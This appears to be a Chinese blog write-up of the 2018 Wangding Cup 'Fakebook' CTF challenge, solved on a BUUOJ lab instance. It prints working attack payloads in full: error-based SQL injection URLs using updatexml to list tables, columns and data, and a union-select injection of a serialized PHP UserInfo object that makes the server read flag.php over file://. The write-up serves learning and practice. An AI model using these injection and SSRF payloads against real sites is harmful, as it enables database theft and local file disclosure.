网鼎杯2018Fakebook

本文最后更新于:2024年4月6日 下午

​ 老规矩啊,拿到题目先信息收集。看看有没有什么备份文件,git泄漏,robots.txt等等。

不出所料,这题给了个robots.txt获得源代码。

image-20211121225141224

image-20211121225204874

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = ""; #定义变量

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    } #对象的构建方法,进行赋值操作

    function get($url)
    {
        $ch = curl_init(); #这个函数我个人是第一次见哈,在下面给一段官方文档

        curl_setopt($ch, CURLOPT_URL, $url); #设置url
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); #设置返回值为字符串
        $output = curl_exec($ch); #执行
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); #获取httpcode
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    } #获取博客内容

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog); 
    } #判断博客那里的输入,本来想用伪协议读一下的,被过滤了

}

咱给他注释一下。

这里说一下上面那个curl哈,其实就是初始化一下curl会话,返回一个curl句柄,给curl_setopt()curl_exec()curl_close() 函数使用.如果成功返回句柄,如果失败返回false。

image-20211121225802557

好吧,一番尝试,我没招了,跑去看大佬wp

看完恍然大悟,目光一直盯着ssrf不放,没发现一个很明显的注入点

1
http://cbbe028d-8d11-4936-ab0a-ce9c6d2fd080.node4.buuoj.cn:81/view.php?no=2

这里存在sql注入

image-20211123221746702

联合查询,用注释绕过对union select的过滤,发现只有一个回显点位。

image-20211123221907404

得到数据库名

但是接下来往下注就没东西了

image-20211123222238526

如图,会返回报错,于是开始报错注入

1
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()),%27~%27),1)%23

image-20211123222730648

1
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),%27~%27),1)%23

image-20211123223025398

1
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20data%20from%20users),%27~%27),1)%23

image-20211123223109668

发现数据是序列化的哈

1
O:8:"UserInfo":3:{s:4:"name";s:'

只回显了一半

substring()截断读取

1
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20substring(data,31)%20from%20users),%27~%27),1)%23

image-20211123224539504

咱来还原一下

1
2
3
4
5
6
7
8
9
10
<?php
    
    class UserInfo{
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";
}
$a = new UserInfo();
echo serialize($a);
?>

其实本质就是通过序列化的方式ssrf

1
O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

image-20211123225322693

1
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:4:%22test%22;s:3:%22age%22;i:1;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27%23

image-20211123225450785

CTF

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!